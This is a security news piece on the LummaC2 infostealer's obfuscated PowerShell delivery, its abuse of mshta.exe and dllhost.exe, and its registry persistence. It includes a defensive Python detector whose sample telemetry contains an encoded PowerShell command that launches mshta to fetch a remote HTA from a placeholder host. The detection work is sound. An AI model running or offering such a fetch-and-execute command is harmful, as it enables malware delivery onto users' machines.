LummaC2 infostealer uses obfuscated PowerShell scripts to target endpoints – Cyber Tech

A new sample of the LummaC2 infostealer was observed using a series of PowerShell commands that downloaded and executed a payload on a targeted endpoint.

In a recent blog post, researchers at Ontinue described LummaC2 as information-stealing malware written in the C programming language that is designed to steal sensitive information.

The researchers said the malware was observed being used as malware-as-a-service (MaaS), and was seen on Russian-speaking forums starting in 2022. The malware infects the target host and aims to steal information from the endpoint and then exfiltrate it to the C2 server.

“The key takeaway from our analysis is a reinforcement of the importance of monitoring and mitigating obfuscated scripts, particularly those delivered via PowerShell,” said Rhys Downing, cyber defender at Ontinue. “While the use of obfuscated PowerShell commands is not new, it remains a highly effective technique for attackers. Security teams should prioritize enhancing their detection and response capabilities around such tactics, ensuring that even well-known methods are continuously scrutinized and blocked.”

Why security pros should pay attention to LummaC2’s resurgence

LummaC2’s resurgence highlights significant risks because of its sophisticated use of PowerShell and “living-off-the-land” binaries already available within an environment, making it harder to detect and mitigate, said Jason Soroko, senior fellow at Sectigo.

Unlike typical PowerShell-based malware, Soroko said LummaC2 combines obfuscation, trusted Windows binaries (Mshta.exe and Dllhost.exe), and persistence techniques via registry modifications to evade defenses and maintain long-term control.

“The critical takeaway is the malware’s advanced multi-stage infection process and ability to exploit legitimate system tools, which requires heightened vigilance and proactive defense strategies from security teams,” said Soroko. “While PowerShell commands are commonly exploited, LummaC2’s combination of tactics presents a unique and more challenging threat.”
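The three behaviours Soroko lists (encoded PowerShell, trusted binaries such as mshta.exe and dllhost.exe launched from a script host, and Run-key persistence) can be expressed as simple detection heuristics over process and registry telemetry. The following is an added example, not code from Ontinue or from the article; the event records, the `placeholder.invalid` URL and the `PLACEHOLDER-GUID` are constructed, and the Sysmon-like field names are assumptions.

```python
import base64
import re

# Constructed, Sysmon-style telemetry for illustration; none of it is captured LummaC2 data.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode('Start-Process mshta "http://placeholder.invalid/stage.hta"'.encode("utf-16-le")).decode()
EVENTS = [
    {"type": "process", "pid": 4100, "ppid": 3900, "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"type": "process", "pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta "http://placeholder.invalid/stage.hta"'},
    {"type": "registry", "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process", "pid": 5100, "ppid": 800, "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": "dllhost.exe /Processid:{PLACEHOLDER-GUID}"},  # ordinary COM surrogate; parent is not a script host
    {"type": "process", "pid": 6000, "ppid": 3900, "image": PS, "cmdline": "powershell.exe Get-Date"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "dllhost.exe"}  # the trusted Windows binaries named in the article
RUN_KEY = re.compile(r"(?i)\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str) -> str:
    """Recover the plaintext behind -EncodedCommand (base64 of UTF-16LE); '' if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Flag encoded PowerShell, a script host spawning a LOLBin, and Run-key writes by either."""
    image_by_pid = {e["pid"]: basename(e["image"]) for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        img = basename(e["image"])
        if e["type"] == "process" and img in SCRIPT_HOSTS and (decoded := decode_encoded_command(e["cmdline"])):
            findings.append((e["pid"], f"encoded PowerShell decodes to: {decoded}"))
        if e["type"] == "process" and img in LOLBINS and image_by_pid.get(e["ppid"]) in SCRIPT_HOSTS:
            findings.append((e["pid"], f"{img} spawned by {image_by_pid[e['ppid']]}"))
        if e["type"] == "registry" and img in SCRIPT_HOSTS | LOLBINS and RUN_KEY.search(e["target"]):
            findings.append((e["pid"], f"{img} wrote autorun key {e['target']}"))
    return findings
```

Decoding the `-EncodedCommand` argument before matching is what lets the first heuristic see the mshta launch hidden inside the base64, while the benign dllhost.exe and the plain PowerShell invocation produce no findings.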

Itzik Alvas, co-founder and CEO at Entro Security, added that the LummaC2 infostealer lets attackers compromise credentials of human and non-human identities (NHIs) on infected systems. Alvas said while the initial scope of attack is often relatively benign and most industries have standardized IAM and governance controls in place to limit risks associated with compromised human credentials, NHIs are often created and used with excessive permissions.

“As a result, compromised NHIs allow attackers on an infected system to covertly attack the entire organization from within,” said Alvas.
